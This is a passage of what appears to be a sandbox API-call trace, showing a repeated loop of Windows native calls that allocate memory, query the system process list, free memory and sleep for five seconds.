SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0217.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.819] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0217.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0217.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0217.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0217.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0217.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0217.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.977] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0217.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0217.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0217.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0217.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0217.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0218.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.109] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0218.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0218.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.256] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0218.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0218.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.451] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0218.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0218.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.602] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0218.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0218.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.747] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0218.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0218.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.907] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0218.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0219.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.041] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0219.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0219.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0219.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0219.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.187] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0219.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0219.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0219.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0219.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.360] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0219.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0219.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0219.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0219.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.509] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0219.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0219.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0219.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0219.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.656] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0219.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0219.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0219.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0219.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.781] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0219.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0219.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0219.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0219.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.919] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0219.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0219.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0219.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0220.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.073] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0220.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0220.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0220.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0220.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.223] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0220.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0220.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0220.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0220.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.360] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0220.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0220.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0220.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0220.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.483] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0220.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0220.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0220.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0220.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.596] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0220.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0220.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0220.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0220.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.724] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0220.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0220.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0220.727] NtFreeVirtualMemory 